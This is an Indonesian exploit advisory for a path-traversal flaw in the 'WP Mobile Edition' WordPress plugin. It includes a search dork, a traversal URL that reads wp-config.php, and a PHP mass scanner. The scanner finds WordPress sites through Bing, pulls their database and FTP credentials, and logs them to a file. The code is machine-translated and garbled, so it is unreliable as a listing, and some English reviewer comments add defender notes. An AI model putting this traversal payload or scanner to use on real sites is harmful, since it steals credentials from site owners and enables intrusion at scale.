Plugin WordPress 'WP Mobile Edition' LFI Vulnerability
# Exploit Judul: WordPress Plugin 'WP Mobile Edition' LFI Vulnerability #
# Tanggal: 6 Juni 2015 #
# Exploit Penulis: Virus OS #
# Google Dork: iilnurl:? Fdx_switcher = Mobe #
# Penjual Homepage: https://wordpress.org/plugins/wp-mobile-edition/ #
# Software Link: https://downloads.wordpress.org/plugin/wp-mobile-edition.2.2.7.zip #
# Versi: WP Mobile Edition Versi 2.2.7 #
# Diuji pada: Windows #
########################################
Keterangan:
Plugin WordPress 'WP Mobile Edition' tidak menyaring data masukan, sehingga file konfigurasi dapat diambil melalui path
<Site.com/wp-content/themes/mTheme-Unus/css/css.php?files = .. / .. / .. / .. / wp-config.php>
# Exploit Kode:
<? php
// Virus OS
// Review note: this listing is machine-translated (keywords, operators and some variable
// names are garbled), so it is not runnable as shown; the comments below describe the
// intent that is visible from the structure only.
//
// Mass scanner: reads an IPv4 prefix from STDIN, walks the last octet 0..255, asks the
// bing() helper for WordPress hosts on each address, requests the plugin's css.php with a
// '../' traversal value aimed at wp-config.php, and tests the response for wp-config.php
// constants. Hits are appended to exploited.txt in the working directory.
//
// Defender notes: on the target side the observable is a request to
// /wp-content/themes/mTheme-Unus/css/css.php whose file parameter carries '../' sequences
// (see the $linkof line below); a WAF/log rule on that path plus traversal tokens catches
// both this scanner and the manual PoC from the header. The header lists plugin version
// 2.2.7 as affected; removing or updating the plugin is the mitigation.

// No runtime limit and all error output suppressed: the scan runs silently.
set_time_limit (0);
error_reporting (0);
// Banner / credits output.
echo "############### Fdx_Switcher Minibot Dengan ip Rentang ################## \ n \ n";
print "Kode By _
__ _ (_) _ __ _ _ ___ ___ ___
\ \ / / | '__ | | | / __ | / _ \ / __ |
\ V / | | | | | _ | \ __ \ | (_) \ __ \
\ _ / | _ | _ | \ __, _ | ___ / \ ___ / | ___ /
Menyapa >> CoderLeeT | Fallag Gassrini | Taz | S4hk | Sir Matrix | Kuroi'SH
";
echo "Follow Me On FaceBook: https://www.facebook.com/VirusXOS\n\n";
echo "Follow Me On FaceBook: https://www.facebook.com/Weka.Mashkel007\n\n";
echo "#################### Selamat Guru Virus OS ################ \ n \ n";
// Target prefix: read "a.b.c.d" from STDIN, split on '.', keep the first three octets.
echo "Server Sasaran IP:";
$ ip = trim (fgets (STDIN, 1024));
$ ip = meledak (, $ ip '.');
. '.'.. '.'. $ ip = $ ip [0] $ ip [1] $ ip [2]. '.';
// Enumerate the last octet 0..255.
untuk ($ i = 0; $ i <= 255; $ i ++)
{
// Search-engine dork "ip:<address> wordpress" -> host names via situs(), deduplicated.
$ situs = array_map ("situs", bing ("ip: $ ip $ i wordpress."));
$ un = array_unique ($ situs);
echo "[+] Scanning ->", $ ip $ i, "\ n";. "."
echo "Ditemukan:" Count ($ situs) "situs \ n \ n";.
foreach ($ un sebagai $ pok) {
// NOTE(review): $file is not fetched until four lines further down, so these four reads see
// the previous iteration's content (nothing on the first pass). $kita and $pw are never used
// and $host/$db are reassigned inside the if-branch below.
$ host = findit ($ file, "DB_HOST ','", "');");
$ db = findit ($ file, "DB_NAME ','", "');");
$ kita = findit ($ file, "DB_USER ','", "');");
$ pw = findit ($ file, "DB_PASSWORD ','", "');");
// Build the plugin's css.php URL with a '../' traversal value pointing at wp-config.php and
// fetch it with the '@' error suppressor, so failures are silent.
$ bda = "http: // $ pok";
$ linkof = '/ wp-content / themes / mTheme-Unus / css / css.php file = .. / .. / .. / .. / wp-config.php?';
$ dn = ($ bda) ($ linkof).;
$ file = @ file_get_contents ($ dn);
// Success heuristic: the response contains DB_HOST (wp-config.php was disclosed) but no
// FTP_USER. eregi() is the case-insensitive POSIX regex function removed in PHP 7.0, which
// dates this sample.
if (eregi ('DB_HOST', $ file) dan! eregi ('FTP_USER', $ file)) {
// Print and re-extract DB_NAME / DB_USER / DB_PASSWORD / DB_HOST from the disclosed file.
.. echo "[+] Scanning =>" $ bda "\ n \ n";
echo "[+] DB NAME:" .findit ($ file, "DB_NAME ','", "');") "\ n \ n";.
echo "[+] DB USER:" .findit ($ file, "DB_USER ','", "');") "\ n \ n";.
echo "[+] DB LULUS:". .findit ($ file, "DB_PASSWORD ','", "');") "\ n \ n";
echo "[+] DB host:" .findit ($ file, "DB_HOST ','", "');") "\ n \ n";.
$ db = "[+] DB NAME:". .findit ($ file, "DB_NAME ','", "');") "\ n \ n";
$ user = "[+] DB PENGGUNA:". .findit ($ file, "DB_USER ','", "');") "\ n \ n";
$ pass = "[+] DB LULUS:". .findit ($ file, "DB_PASSWORD ','", "');") "\ n \ n";
$ host = "[+] DB host:". .findit ($ file, "DB_HOST ','", "');") "\ n \ n";
// Append the target URL and the four extracted lines to exploited.txt ('ab' = append,
// binary). The handle is never closed, so buffered write errors are never surfaced.
$ ux = "" $ bda.. "\ r \ n";
$ ux1 = "". $ db. "\ r \ n";
$ UX2 = "" $ user.. "\ r \ n";
$ ux3 = "". $ lulus. "\ r \ n";
$ ux4 = "" $ host.. "\ r \ n";
$ menyelamatkan = fopen ('exploited.txt', 'ab');
fwrite ($ simpan, "$ ux");
fwrite ($ simpan, "$ ux1");
fwrite ($ simpan, "$ UX2");
fwrite ($ simpan, "$ ux3");
fwrite ($ simpan, "$ ux4");
}
// Second branch: a disclosed config that also defines FTP_* constants; these are only
// printed, not written to the output file.
elseif (eregi ('DB_HOST', $ file) dan eregi ('FTP_USER', $ file)) {
echo "user FTP:" .findit ($ file, "FTP_USER ','", "');") "\ n \ n";.
echo "FTP lulus:" .findit ($ file, "FTP_PASS ','", "');") "\ n \ n";.
echo "FTP host:" .findit ($ file, "FTP_HOST ','", "');") "\ n \ n";.
}
// Neither marker present (host not affected, empty or error response): failure message.
else {echo $ bda ": Eksploitasi gagal \ n \ n";.}
}
}
// Returns the text between the first (case-insensitive, stripos) occurrence of $StartTag
// and the next $EndTag found after it. The caller passes tags such as "DB_NAME ','" and
// "');" to pull define() values out of a fetched wp-config.php.
// NOTE(review): if either tag is absent, stripos() returns false and the offset arithmetic
// below produces meaningless substr() bounds; nothing guards against that case.
Fungsi findit ($ mytext, $ StartTag, $ EndTag) {
$ posLeft = stripos ($ mytext, $ StartTag) + strlen ($ StartTag);
$ posRight = stripos ($ mytext, $ EndTag, $ posLeft + 1);
pulang substr ($ mytext, $ posLeft, $ posRight- $ posLeft);
}
// Reduces a URL to its host name (parse_url with PHP_URL_HOST) with spaces removed; used
// as the array_map callback over the search results in the main loop.
situs function ($ link) {
kembali str_replace ("", "", parse_url ($ link PHP_URL_HOST));
}
// Pages through Bing web-search results for the given query (first=1, 11, ..., up to 2000),
// collects every href matched by the regex on each result page, and stops early when the
// page carries no "sw_next" link. Returns the unique, urldecoded links, or nothing at all
// when none were collected (the final if has no else).
// Defender notes: the request spoofs the msnbot User-Agent, disables TLS peer verification
// and keeps a cookie jar in the working directory (cookie.txt) — artifacts an analyst would
// expect to find next to exploited.txt on the scanning host.
Fungsi bing ($ apa) {
untuk ($ i = 1; $ i <= 2000; $ i + = 10) {
$ ch = curl_init ();
curl_setopt ($ ch, CURLOPT_URL, "http://www.bing.com/search?q=".urlencode($what)."&first=".$i."&FORM=PERE");
curl_setopt ($ ch, CURLOPT_USERAGENT, "msnbot / 1.0 (http://search.msn.com/msnbot.htm)");
// Certificate validation switched off for the search request.
curl_setopt ($ ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ ch, CURLOPT_COOKIEFILE, getcwd () '/ cookie.txt'.);
curl_setopt ($ ch, CURLOPT_COOKIEJAR, getcwd () '/ cookie.txt'.);
curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ ch, CURLOPT_FOLLOWLOCATION, 1);
$ data = curl_exec ($ ch);
// Harvest result hrefs from the page body.
preg_match_all ('#;? a = (*) "h =" #.', $ data, $ link);
foreach ($ link [1] sebagai $ link) {
$ allLinks [] = $ Link;
}
// No "next page" control on this page: stop paging.
jika istirahat (preg_match ('# "sw_next" #', $ data)!);
}
if (! empty ($ allLinks) && is_array ($ allLinks)) {
kembali array_unique (array_map ("urldecode", $ allLinks));
}
}